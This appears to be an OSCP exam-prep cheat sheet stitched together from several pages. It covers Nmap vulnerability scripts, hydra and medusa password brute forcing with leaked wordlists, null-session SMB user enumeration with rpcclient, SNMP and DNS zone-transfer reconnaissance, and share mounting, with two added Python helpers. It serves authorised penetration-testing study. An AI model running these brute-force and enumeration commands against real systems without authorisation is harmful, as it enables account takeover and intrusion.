Checks if an IRC server is backdoored by running a time-based command (ping) and checking how long it takes to respond.
mysql-vuln-cve2012-2122

Attempts to bypass authentication in MySQL and MariaDB servers by exploiting CVE-2012-2122. If the server is vulnerable, it will also attempt to dump the MySQL usernames and password hashes.
netbus-auth-bypass

Checks if a NetBus server is vulnerable to an authentication bypass vulnerability which allows full access without knowing the password.
qconn-exec

Attempts to identify whether a listening QNX QCONN daemon allows unauthenticated users to execute arbitrary operating system commands.
rdp-vuln-ms12-020

Checks if a machine is vulnerable to MS12-020 RDP vulnerability.
realvnc-auth-bypass

Checks if a VNC server is vulnerable to the RealVNC authentication bypass (CVE-2006-2369).
rmi-vuln-classloader

Tests whether Java rmiregistry allows class loading. The default configuration of rmiregistry allows loading classes from remote URLs, which can lead to remote code execution. The vendor (Oracle/Sun) classifies this as a design feature.
samba-vuln-cve-2012-1182

Checks if target machines are vulnerable to the Samba heap overflow vulnerability CVE-2012-1182.
smb-vuln-conficker

Detects Microsoft Windows systems infected by the Conficker worm. This check is dangerous and it may crash systems.
smb-vuln-cve2009-3103

Detects Microsoft Windows systems vulnerable to denial of service (CVE-2009-3103). This script will crash the service if it is vulnerable.
smb-vuln-ms06-025

Detects Microsoft Windows systems with Ras RPC service vulnerable to MS06-025.
smb-vuln-ms07-029

Detects Microsoft Windows systems with Dns Server RPC vulnerable to MS07-029.
smb-vuln-ms08-067

Detects Microsoft Windows systems vulnerable to the remote code execution vulnerability known as MS08-067. This check is dangerous and it may crash systems.
smb-vuln-ms10-054

Tests whether target machines are vulnerable to the ms10-054 SMB remote memory corruption vulnerability.
smb-vuln-ms10-061

Tests whether target machines are vulnerable to ms10-061 Printer Spooler impersonation vulnerability.
smb-vuln-regsvc-dos

Checks if a Microsoft Windows 2000 system is vulnerable to a crash in regsvc caused by a null pointer dereference. This check will crash the service if it is vulnerable and requires a guest account or higher to work.
smtp-vuln-cve2010-4344

Checks for and/or exploits a heap overflow within versions of Exim prior to version 4.69 (CVE-2010-4344) and a privilege escalation vulnerability in Exim 4.72 and prior (CVE-2010-4345).
smtp-vuln-cve2011-1720

Checks for a memory corruption in the Postfix SMTP server when it uses Cyrus SASL library authentication mechanisms (CVE-2011-1720). This vulnerability can allow denial of service and possibly remote code execution.
smtp-vuln-cve2011-1764

Checks for a format string vulnerability in the Exim SMTP server (version 4.70 through 4.75) with DomainKeys Identified Mail (DKIM) support (CVE-2011-1764). The DKIM logging mechanism did not use format string specifiers when logging some parts of the DKIM-Signature header field. A remote attacker who is able to send emails, can exploit this vulnerability and execute arbitrary code with the privileges of the Exim daemon.
ssl-ccs-injection

Detects whether a server is vulnerable to the SSL/TLS “CCS Injection” vulnerability (CVE-2014-0224), first discovered by Masashi Kikuchi. The script is based on the ccsinjection.c code authored by Ramon de C Valle (https://gist.github.com/rcvalle/71f4b027d61a78c42607)
ssl-cert-intaddr

Reports any private (RFC1918) IPv4 addresses found in the various fields of an SSL service’s certificate. These will only be reported if the target address itself is not private. Nmap v7.30 or later is required.
ssl-dh-params

Weak ephemeral Diffie-Hellman parameter detection for SSL/TLS services.
ssl-heartbleed

Detects whether a server is vulnerable to the OpenSSL Heartbleed bug (CVE-2014-0160). The code is based on the Python script ssltest.py authored by Jared Stafford (jspenguin@jspenguin.org)
ssl-known-key

Checks whether the SSL certificate used by a host has a fingerprint that matches an included database of problematic keys.
ssl-poodle

Checks whether SSLv3 CBC ciphers are allowed (POODLE)
sslv2-drown

Determines whether the server supports SSLv2, what ciphers it supports and tests for CVE-2015-3197, CVE-2016-0703 and CVE-2016-0800 (DROWN)
supermicro-ipmi-conf

Attempts to download an unprotected configuration file containing plain-text user credentials in vulnerable Supermicro Onboard IPMI controllers.
tls-ticketbleed

Detects whether a server is vulnerable to the F5 Ticketbleed bug (CVE-2016-9244).
wdb-version

Detects vulnerabilities and gathers information (such as version numbers and hardware support) from VxWorks Wind DeBug agents.
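The list above tells you what each script looks for, but on the exam what you actually sit in front of is the output of a run like nmap --script vuln -oX scan.xml against a dozen hosts. The following is an added example, not part of this page and not Nmap project code: a small stdlib-only triage script that pulls every NSE finding whose state is VULNERABLE (or LIKELY VULNERABLE) out of the XML, whether the script ran per port or per host, and lists them most urgent first. The SAMPLE_XML document is constructed for the example (trimmed and not from any real scan); the state strings it checks for are the ones the NSE vulns library emits.

```python
import xml.etree.ElementTree as ET

# NSE "vulns" library states worth acting on, most urgent first.
STATE_PRIORITY = ["VULNERABLE (Exploitable)", "VULNERABLE (DoS)", "VULNERABLE", "LIKELY VULNERABLE"]


def script_findings(script):
    """Yield (finding_id, title, state) for one <script> element.

    Scripts built on the vulns library emit one <table> per finding holding
    'title' and 'state' <elem>s.  Older scripts only have free-text output, so
    fall back to looking for VULNERABLE in that text (ignoring NOT VULNERABLE).
    """
    structured = False
    for table in script.iter("table"):
        elems = {e.get("key"): (e.text or "").strip() for e in table.findall("elem")}
        if "state" in elems:
            structured = True
            yield table.get("key") or script.get("id"), elems.get("title", ""), elems["state"]
    if not structured:
        text = script.get("output", "").strip()
        if "VULNERABLE" in text.upper() and "NOT VULNERABLE" not in text.upper():
            yield script.get("id"), text.splitlines()[0], "VULNERABLE (text match)"


def parse_nmap_xml(xml_text):
    """Return vulnerable findings as dicts, sorted most urgent first.

    Host-level scripts (smb-vuln-*, etc.) live under <hostscript> and get port None;
    service scripts hang off their <port> element.
    """
    root = ET.fromstring(xml_text)
    findings = []
    for host in root.iter("host"):
        addr = next((a.get("addr") for a in host.findall("address")
                     if a.get("addrtype") in ("ipv4", "ipv6")), "?")
        scripts = [(None, s) for hs in host.findall("hostscript") for s in hs.findall("script")]
        for port in host.iter("port"):
            spec = "%s/%s" % (port.get("portid"), port.get("protocol"))
            scripts += [(spec, s) for s in port.findall("script")]
        for spec, script in scripts:
            for fid, title, state in script_findings(script):
                if not state.startswith(("VULNERABLE", "LIKELY VULNERABLE")):
                    continue   # NOT VULNERABLE, UNKNOWN (unable to test), ...
                findings.append({"host": addr, "port": spec, "script": script.get("id"),
                                 "id": fid, "title": title, "state": state})
    rank = {s: i for i, s in enumerate(STATE_PRIORITY)}
    findings.sort(key=lambda f: rank.get(f["state"], len(rank)))
    return findings


# Constructed sample of what `nmap --script vuln -oX` writes (trimmed; not data from a real scan).
SAMPLE_XML = """<nmaprun scanner="nmap">
<host><status state="up"/><address addr="10.0.0.1" addrtype="ipv4"/>
 <ports>
  <port protocol="tcp" portid="443"><state state="open"/><service name="https"/>
   <script id="ssl-heartbleed" output="NOT VULNERABLE">
    <table key="CVE-2014-0160"><elem key="title">The Heartbleed Bug</elem><elem key="state">NOT VULNERABLE</elem></table>
   </script></port>
  <port protocol="tcp" portid="8080"><state state="open"/><service name="http"/>
   <script id="http-vuln-cve2017-5638" output="VULNERABLE">
    <table key="CVE-2017-5638"><elem key="title">Apache Struts Remote Code Execution Vulnerability</elem>
     <elem key="state">VULNERABLE</elem><table key="ids"><elem>CVE:CVE-2017-5638</elem></table></table>
   </script></port>
  <port protocol="tcp" portid="21"><state state="open"/><service name="ftp"/>
   <script id="ftp-anon" output="Anonymous FTP login allowed (FTP code 230)"/></port>
 </ports>
 <hostscript>
  <script id="smb-vuln-ms08-067" output="VULNERABLE">
   <table key="MS08-067"><elem key="title">Microsoft Windows system vulnerable to remote code execution (MS08-067)</elem>
    <elem key="state">VULNERABLE (Exploitable)</elem></table>
  </script>
 </hostscript>
</host>
</nmaprun>"""


if __name__ == "__main__":
    import sys
    xml_text = open(sys.argv[1]).read() if len(sys.argv) > 1 else SAMPLE_XML
    for f in parse_nmap_xml(xml_text):
        print("%-15s %-9s %-26s %-24s %s" % (f["host"], f["port"] or "host", f["script"], f["state"], f["title"]))
```

Run it as python3 vulntriage.py scan.xml; with no argument it parses the built-in sample. The text-match fallback exists only for scripts that never adopted the vulns library, so treat a "VULNERABLE (text match)" line as something to read, not as a confirmed result.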


Cheat Sheet How to pass the OSCP Offensive Security Certified Professional Exam Step-by-Step Guide- Directory/Service Brute Forcing – PART 3

Directory Brute Forcing and Service Brute Forcing

The OSCP exam will almost certainly have a service on which you can brute force a local or admin account. There will also be web servers with unlinked content that you can find, such as password files, user accounts and developer portals that provide easy access.

You will need to gather wordlist files to perform these activities, links are provided at the bottom of this section for download.

 

DirBuster

This is a GUI-based directory brute forcing application that can be very quick if your system can support it.


 

A very powerful command-line alternative is "dirb" (the URL and the wordlist are separate arguments):

root@wittyserver:~/oscp/# dirb http://192.168.1.101/ /root/oscp/dirbuster/common.txt

—————–
DIRB v2.22
By The Dark Raver
—————–

URL_BASE: http://192.168.1.101/
WORDLIST_FILES: /root/oscp/dirbuster/common.txt

—————–

GENERATED WORDS: 1942

—- Scanning URL: http://192.168.1.101/ —-
==> DIRECTORY: http://192.168.1.101/assets/
==> DIRECTORY: http://192.168.1.101/passwords/

Brute forcing services:

Hydra is a tool to guess/crack valid login/password pairs. Licensed under AGPL
v3.0. The newest version is always available at http://www.thc.org/thc-hydra
Don’t use in military or secret service organizations, or for illegal purposes.

Supported services: asterisk cisco cisco-enable cvs firebird ftp ftps http[s]-{head|get|post} http[s]-{get|post}-form http-proxy http-proxy-urlenum icq imap[s] irc ldap2[s] ldap3[-{cram|digest}md5][s] mssql mysql nntp oracle-listener oracle-sid pcanywhere pcnfs pop3[s] postgres rdp redis rexec rlogin rsh rtsp s7-300 sip smb smtp[s] smtp-enum snmp socks5 ssh sshkey svn teamspeak telnet[s] vmauthd vnc xmpp

 

root@wittyserver:~/oscp/# hydra -L /root/oscp/dirbuster/big.txt -P /root/wordlist/500-worst-passwords.txt ssh://192.168.1.101

hydra -l admin -P /usr/share/wordlists/rockyou.txt -o results.txt ssh://10.0.0.1

root@wittyserver:~# medusa -h 192.168.1.100 -U users.txt -P passwords.txt -M ssh

Crack Passwords (hydra/THC bruter)
(needs mil-dict.txt, the milw0rm cracked-hashes wordlist; <user> and <target> below are placeholders for your own values)

FTP – hydra -l <user> -P mil-dict.txt -f <target> ftp -V

POP3 – hydra -l <user> -P mil-dict.txt -f <target> pop3 -V (may need to use -t 15 to limit concurrent connections)

SNMP – hydra -P mil-dict.txt -f <target> snmp -V

MS VPN – dos2unix words (whatever word list), then: cat words | thc-pptp-bruter <vpn server>

Wordlist

http://www.packetstormsecurity.org/Crackers/wordlists/
http://www.theargon.com/achilles/wordlists/
http://www.openwall.com/wordlists/
http://www.outpost9.com/files/WordLists.html

I like to keep 3 size word lists:

1. small and fast: usually based on the output of one of the tools I'm about to tell you about

2. medium: this is my custom list that I add passwords I find / crack and generally think are good to add. I’m pretty picky about what goes into this list

3. huge: any wordlist I come across gets added to this list, it gets sorted and uniqued and restored

Now the two tools that I like for the small list are CeWL and wyd:

CeWL – http://www.digininja.org/projects/cewl.php
Wyd – http://www.remote-exploit.org/codes_wyd.html

They have some very similar lists of features, your mileage may vary. But they basically parse files and web pages for words and generate password lists based on the words found.

Update on Sunday, February 21, 2010 at 1:57AM by Rob Fuller

I missed one hell of a treasure trove of word lists:

http://trac.kismac-ng.org/wiki/wordlists
http://www.openwall.com/mirrors/
http://passwordz.info/
ftp://ftp.ox.ac.uk/pub/wordlists/
http://gdataonline.com/downloads/GDict/
http://theargon.com/achilles/wordlists/
http://theargon.com/achilles/wordlists/theargonlists/
ftp://ftp.cerias.purdue.edu/pub/dict/
http://www.outpost9.com/files/WordLists.html
http://www.securinfos.info/wordlists_dictionnaires.php
http://www.vulnerabilityassessment.co.uk/passwords.htm
http://packetstormsecurity.org/Crackers/wordlists/
http://www.ai.uga.edu/ftplib/natural-language/moby/
http://www.insidepro.com/eng/download.shtml
http://www.word-list.com/
http://www.cotse.com/tools/wordlists1.htm
http://www.cotse.com/tools/wordlists2.htm
http://www.phreak.org/index/archive01/hacking/wordlsts/wordlsts.shtml
http://www.indianz.ch/tools/doc/wordlists.zip
http://wordlist.sourceforge.net/
http://prdownloads.sourceforge.net/wepattack/wordlist.tar.gz?download
http://hacor.org/docs/hugelist.txt (broken link. Does anyone have it hosted elsewhere?)
shhh! – http://www.room362.com/storage/saved/hugelist.txt
http://ftp.sunet.se/pub/security/tools/net/Openwall/wordlists/
ftp://ftp.openwall.com/pub/wordlists/

http://www.skullsecurity.org/wiki/index.php/Passwords

hotmail: http://current.com/technology/91108676_email-password-leak-update-gmail-yahoo-aol-and-hotmail-hit-too.htm

rockyou: http://securitystream.info/data-breaches/easy-passwords-found-in-rockyou-data-leak/

http://wordlist.sourceforge.net/  (Kevin’s Word Lists)

http://www.phenoelit-us.org/dpl/dpl.html

http://www.offensive-security.com/wpa-tables/wpalist.txt.tar.bz2

http://www.renderlab.net/projects/WPA-tables/

https://github.com/jeanphorn/wordlist


Cheat Sheet How to pass the OSCP Offensive Security Certified Professional Exam Step-by-Step Guide- ENUMERATING SERVICES – PART 2

ENUMERATING SERVICES

 

Enumerating services is a vital next step; this will help us identify users, host information, protocol weaknesses and vulnerabilities we can use to our advantage.

nmap -vv -Pn -A -sC -sS -T 4 -p- 10.0.0.1
Web Enumeration:

dirb http://10.0.0.1 /usr/share/wordlists/dirb/common.txt

nikto -host http://10.0.0.1
SMB\RPC Enumeration:

Netbios/SMB

smb4k (graphical interface – lists shares)

smbserverscan
metasploit auxiliary scanner

./msfconsole
use auxiliary/scanner/smb/smb_version

set RHOSTS 192.168.0.1-192.168.0.254

run
Enumerate Usernames (SNMP/SMTP/SMB[NETBIOS]/Add others here)
For SMB

nmap -sT -p 445 192.168.9.200-254 -oG smb_results.txt (then grep the greppable output for open 445)

./samrdump.py 192.168.9.201 (Impacket's samrdump, kept in /root/offsec on my machine; run it against the hosts found above)

enum4linux 10.0.0.1

nmap --script=smb-enum-domains.nse,smb-enum-groups.nse,smb-enum-processes.nse,smb-enum-sessions.nse,smb-enum-shares.nse,smb-enum-users.nse,smb-ls.nse,smb-mbenum.nse,smb-os-discovery.nse,smb-print-text.nse,smb-psexec.nse,smb-security-mode.nse,smb-server-stats.nse,smb-system-info.nse,smb-vuln-conficker.nse,smb-vuln-cve2009-3103.nse,smb-vuln-ms06-025.nse,smb-vuln-ms07-029.nse,smb-vuln-ms08-067.nse,smb-vuln-ms10-054.nse,smb-vuln-ms10-061.nse,smb-vuln-regsvc-dos.nse,smbv2-enabled.nse 10.0.0.1
Mysql Enumeration:

nmap -sV -Pn -vv --script=mysql-audit,mysql-databases,mysql-dump-hashes,mysql-empty-password,mysql-enum,mysql-info,mysql-query,mysql-users,mysql-variables,mysql-vuln-cve2012-2122 10.0.0.1 -p 3306
SMTP Enumeration:

nmap --script=smtp-commands,smtp-enum-users,smtp-vuln-cve2010-4344,smtp-vuln-cve2011-1720,smtp-vuln-cve2011-1764 -p 25 10.0.0.1
SNMP Enumeration:

snmpwalk -c public -v1 192.168.9.254 1 | grep hrSWRunName | cut -d" " -f4 (lists the running processes)

snmpwalk -c public -v1 10.0.0.1

snmpenum -t 192.168.0.100 (displays all snmp informations for that server)

nmap -sU -p 161 192.168.9.200-254 -oG snmp_results.txt (SNMP is UDP, so a -sT TCP scan will never find it; then grep)

– snmpwalk -c public -v1 192.168.9.201 1 | grep 77.1.2.25 | cut -d" " -f4 (Windows user accounts via the LanManager MIB)

For SMTP – (/pentest/enumeration/vrfy)

./smtp_VRFY.py

** NEED TO MAKE THREADED – VERY SLOW **

SAMRDUMP.PY – (/pentest/python/impacket-examples/samrdump.py)

– ./samrdump.py <target>

nc -v <target> 25 (manual banner grab and VRFY/EXPN against the SMTP service)
FTP Enumeration:

nmap --script=ftp-anon,ftp-bounce,ftp-libopie,ftp-proftpd-backdoor,ftp-vsftpd-backdoor,ftp-vuln-cve2010-4221,tftp-enum -p 21 10.0.0.1

 

DNS ENUMERATION

The types of enumeration that DNSRecon performs include the following:

  • Zone Transfer
  • Reverse Lookup
  • Domain and Host Brute-Force
  • Standard Record Enumeration (wildcard,SOA,MX,A,TXT etc.)
  • Cache Snooping
  • Zone Walking
  • Google Lookup

Standard Record Enumeration

To perform standard DNS enumeration with DNSRecon, the command to use is ./dnsrecon.py -d <domain>. So let's try that command against the domain cisco.com to see what kind of information we can retrieve.

Zone Transfer

The security problem with DNS zone transfer is that it can be used to map the topology of a company's network. Specifically, a zone transfer is a DNS query that asks the server to hand over every record in the zone: name servers, host names, MX and CNAME records, the zone serial number, TTL values and so on. Because of the amount of information it reveals, an unrestricted zone transfer is rarely found nowadays, but DNSRecon provides the ability to attempt one with the commands

./dnsrecon.py -d <domain> -a or

./dnsrecon.py -d <domain> -t axfr
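What -t axfr actually puts on the wire is worth seeing once, because it explains both why zone transfers are so valuable and what the usual REFUSED answer looks like. The following is an added example, not part of this page and not DNSRecon code: a minimal AXFR client in stdlib Python that builds the query, speaks DNS over TCP (2-byte length prefix), decodes compressed names, and stops when the SOA record appears a second time, which is how the protocol marks the end of a transfer. sample_axfr_response() is a constructed reply for a made-up example.com zone, not captured from any real server, so the decoder can be exercised offline; the axfr() function is what you would point at a real name server.

```python
import socket
import struct
import sys

QTYPE_AXFR = 252
TYPE_NAMES = {1: "A", 2: "NS", 5: "CNAME", 6: "SOA", 12: "PTR", 15: "MX", 16: "TXT", 28: "AAAA"}


def encode_name(name):
    # "www.example.com" -> length-prefixed labels 3www 7example 3com, terminated by a zero byte
    labels = [l for l in name.rstrip(".").split(".") if l]
    return b"".join(bytes([len(l)]) + l.encode("ascii") for l in labels) + b"\x00"


def build_query(zone, qtype=QTYPE_AXFR, txn_id=0x1337):
    """12-byte header (one question, no flags) followed by the question for the zone."""
    header = struct.pack("!HHHHHH", txn_id, 0x0000, 1, 0, 0, 0)
    return header + encode_name(zone) + struct.pack("!HH", qtype, 1)   # QCLASS 1 = IN


def read_name(msg, off):
    """Decode a (possibly compressed) name at off; returns (name, offset just past it)."""
    labels, end = [], None
    while True:
        length = msg[off]
        if length & 0xC0 == 0xC0:            # pointer: top two bits set, 14-bit offset follows
            if end is None:
                end = off + 2                # the name ends right after the first pointer we meet
            off = ((length & 0x3F) << 8) | msg[off + 1]
            continue
        off += 1
        if length == 0:
            break
        labels.append(msg[off:off + length].decode("ascii"))
        off += length
    return ".".join(labels) or ".", (end if end is not None else off)


def decode_rdata(msg, off, rtype, rdlen):
    if rtype == 1:
        return ".".join(str(b) for b in msg[off:off + 4])
    if rtype in (2, 5, 12):
        return read_name(msg, off)[0]
    if rtype == 6:                           # SOA: mname, rname, serial (refresh/retry/expire/min omitted)
        mname, o = read_name(msg, off)
        rname, o = read_name(msg, o)
        return "%s %s %d" % (mname, rname, struct.unpack("!I", msg[o:o + 4])[0])
    return msg[off:off + rdlen].hex()        # anything else: raw bytes


def parse_message(msg):
    """Return (rcode, [(owner, type, rdata), ...]) for one DNS message."""
    _, flags, qd, an, ns, ar = struct.unpack("!HHHHHH", msg[:12])
    off = 12
    for _ in range(qd):                      # skip the echoed question section
        off = read_name(msg, off)[1] + 4
    records = []
    for _ in range(an + ns + ar):
        name, off = read_name(msg, off)
        rtype, _, _, rdlen = struct.unpack("!HHIH", msg[off:off + 10])
        off += 10
        records.append((name, TYPE_NAMES.get(rtype, str(rtype)), decode_rdata(msg, off, rtype, rdlen)))
        off += rdlen
    return flags & 0x000F, records


def recv_exact(sock, n):
    buf = b""
    while len(buf) < n:
        chunk = sock.recv(n - len(buf))
        if not chunk:
            raise ConnectionError("server closed the connection mid-transfer")
        buf += chunk
    return buf


def axfr(server, zone, port=53, timeout=10.0):
    """Ask server for the whole zone over TCP; the transfer ends when the SOA appears a second time."""
    query = build_query(zone)
    records, soa_seen = [], 0
    with socket.create_connection((server, port), timeout=timeout) as sock:
        sock.sendall(struct.pack("!H", len(query)) + query)   # DNS over TCP: 2-byte length prefix
        while soa_seen < 2:
            length = struct.unpack("!H", recv_exact(sock, 2))[0]
            rcode, recs = parse_message(recv_exact(sock, length))
            if rcode != 0:                   # rcode 5 (REFUSED) is what a properly restricted server answers
                raise RuntimeError("AXFR failed with rcode %d" % rcode)
            for rec in recs:
                records.append(rec)
                soa_seen += rec[1] == "SOA"
    return records


def sample_axfr_response():
    """Constructed AXFR reply for a made-up zone (not captured from any real server)."""
    ptr_zone = b"\xc0\x0c"                   # compression pointer to the zone name at offset 12
    def rr(owner, rtype, rdata):
        return owner + struct.pack("!HHIH", rtype, 1, 3600, len(rdata)) + rdata
    soa = (encode_name("ns1.example.com") + encode_name("hostmaster.example.com")
           + struct.pack("!IIIII", 2017031501, 7200, 3600, 1209600, 300))
    msg = struct.pack("!HHHHHH", 0x1337, 0x8400, 1, 4, 0, 0) + encode_name("example.com") + struct.pack("!HH", QTYPE_AXFR, 1)
    msg += rr(ptr_zone, 6, soa)
    msg += rr(ptr_zone, 2, b"\x03ns1" + ptr_zone)              # ns1.example.com, compressed
    msg += rr(b"\x03www" + ptr_zone, 1, bytes([10, 0, 0, 1]))
    return msg + rr(ptr_zone, 6, soa)                           # closing SOA marks the end


if __name__ == "__main__":
    if len(sys.argv) == 3:                   # python3 axfr.py <nameserver> <zone>
        recs = axfr(sys.argv[1], sys.argv[2])
    else:
        recs = parse_message(sample_axfr_response())[1]
    for owner, rtype, rdata in recs:
        print("%-28s %-5s %s" % (owner, rtype, rdata))
```

Ask each authoritative server separately (a secondary is sometimes left open when the primary is locked down), and note that AXFR must be tried over TCP: a UDP query for type 252 is not a transfer.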

Reverse Lookup

A reverse DNS lookup determines the domain name associated with an IP address. DNSRecon can perform a reverse lookup for PTR (Pointer) records against IPv4 and IPv6 address ranges. To run reverse lookup enumeration, the command

./dnsrecon.py -r <startIP-endIP>

must be used. A reverse lookup can also be performed against all ranges found in the domain's SPF records with the command ./dnsrecon.py -d <domain> -s. The next image shows the output of a reverse lookup over a range of IP addresses.

Domain Brute-Force

For this technique all we have to do is supply a name list; DNSRecon will try to resolve the A, AAAA and CNAME records for each entry against the domain, one by one. To run the domain name brute force we type:

./dnsrecon.py -d <domain> -D <namelist> -t brt

Cache Snooping

DNS cache snooping checks whether a DNS server has a specific record cached, which tells you that someone behind that resolver recently looked the name up. Such records can reveal plenty of information, although a resolver that can be snooped is not found very often. The command to perform cache snooping is the following:

./dnsrecon.py -t snoop -n <server> -D <dict>

Zone Walking

This technique may unveil internal records if the zone is not configured properly (the NSEC records of a DNSSEC-signed zone let you walk from one name to the next). The information obtained can help us map network hosts by enumerating the contents of a zone. To perform zone walking we type:

./dnsrecon.py -d <host> -t zonewalk

SMB\RPC Enumeration:
Instead of naming each smb script as in the list further up, you can also use the wildcard (note that smb* also matches smb-brute, which is slow, and the smb-vuln-* checks that can crash the target):
nmap --script=smb* -p 139,445 10.0.0.1
ok_bye_now_ [S] (1 point, 2 months ago):
If you run all of them it'll take forever because of the brute force NSE scripts. That's why I chose to list all of them minus the bruters.

ak_z (6 points, 2 months ago):
nice, but I've seen better

m_ros101 (2 points, 2 months ago):
Great work mate. Thanks for this.

ok_bye_now_ [S] (1 point, 2 months ago):
Enumerating snmp strings is also something I should add to that list. It's fairly easy to overlook but you sometimes find really useful information in there.

qasimchadhar (1 point, 2 months ago):
Thanks. One thing to note, these cheat sheets will come in handy in your professional career too. And as you learn something new, be sure to add to your favorite cheat sheet.
nmap -Pn 192.168.9.200-254 (skip host discovery and treat every address as up)

rpcclient $>

Now type enumdomusers; this will dump a list of the user accounts present on the host, like so:

rpcclient $> enumdomusers
user:[nobody] rid:[0x1f5]
user:[gh0s7] rid:[0x3e8]

Yes, enumerating user accounts through an open Samba or SMB service is that simple. There are many more options that can be used with this program; if you type help at the rpcclient prompt you will see all of them. These are the commands I used to create the log file for this tutorial:
1)enumdomusers
2)netshareenum
3)netshareenumall
4)querydominfo

****Append Log File****
/*NULL SESSION CONNECTION*/
root@bt:~# rpcclient -U "" 192.168.1.12
Enter ‘s password:

/*ENUMERATING USERS*/
rpcclient $> enumdomusers
user:[nobody] rid:[0x1f5]
user:[gh0s7] rid:[0x3e8]
/*FINDING NETWORK SHARE INFO ON THE LOCAL MACHINE*/
rpcclient $> netshareenum
netname: test
remark:
path: C:\media\Gh0$7\test
password:
/*OR*/
rpcclient $> netshareenumall
netname: IPC$
remark: IPC Service (gh0s7-serverhome server (Samba, Ubuntu))
path: C:\tmp
password:
netname: test
remark:
path: C:\media\Gh0$7\test
password:
netname: print$
remark: Printer Drivers
path: C:\var\lib\samba\printers
password:

/*QUERYING SERVER INFO (NAME AND DOMAIN)*/
rpcclient $> querydominfo
Domain: MSHOME
Server: GH0S7-SERVERHOME
Comment: gh0s7-serverhome server (Samba, Ubuntu)
Total Users: 2
Total Groups: 0
Total Aliases: 0
Sequence No: 1321411072
Force Logoff: -1
Domain Server State: 0x1
Server Role: ROLE_DOMAIN_PDC
Unknown 3: 0x1

Mounting unprotected (guest) network folders

First, let’s create the mount directory. You will need a separate directory for each mount.

sudo mkdir /media/windowsshare

Then edit your /etc/fstab file (with root privileges) to add this line:

//servername/sharename  /media/windowsshare  cifs  guest,uid=1000,iocharset=utf8  0  0

Where

guest indicates you don’t need a password to access the share,

uid=1000 makes the Linux user specified by the id the owner of the mounted share, allowing them to rename files,

iocharset=utf8 allows access to files with names in non-English languages. This doesn't work with shares of devices like the Buffalo TeraStation, or Windows machines that export their shares using ISO-8859-15.

If there is any space in the server path, you need to replace it by \040, for example //servername/My\040Documents

After you add the entry to /etc/fstab type:

sudo mount -a

This will (re)mount all entries listed in /etc/fstab.

Mount password protected network folders

The quickest way to auto-mount a password-protected share is to edit /etc/fstab (with root privileges) and add this line:
//servername/sharename  /media/windowsshare  cifs  username=msusername,password=mspassword,iocharset=utf8,sec=ntlm  0  0

This leaves the password in a world-readable file; where possible use credentials=/root/.smbcredentials (a mode 0600 file containing username= and password= lines) instead of username=/password= in fstab. sec=ntlm selects NTLMv1; recent kernels default to ntlmssp and may reject ntlm, so leave the option out unless the server really requires it.

To see which shares are available on a given host, run:

/usr/bin/smbclient -L host

where 'host' is the name of the machine that you wish to view. This will return a list of 'service' names, that is, names of drives or printers that it can share with you. Unless the SMB server has no security configured, it will ask you for a password. You will need the password for the 'guest' account or for your personal account on that machine.

For example:

smbclient -L zimmerman

The output of this command should look something like this:

Server time is Sat Aug 10 15:58:27 1996
Timezone is UTC+10.0
Password:
Domain=[WORKGROUP] OS=[Windows NT 3.51] Server=[NT LAN Manager 3.51]

Server=[ZIMMERMAN] User=[] Workgroup=[WORKGROUP] Domain=[]

Sharename      Type      Comment
———      —-      ——-
ADMIN$         Disk      Remote Admin
public         Disk      Public
C$             Disk      Default share
IPC$           IPC       Remote IPC
OReilly        Printer   OReilly
print$         Disk      Printer Drivers
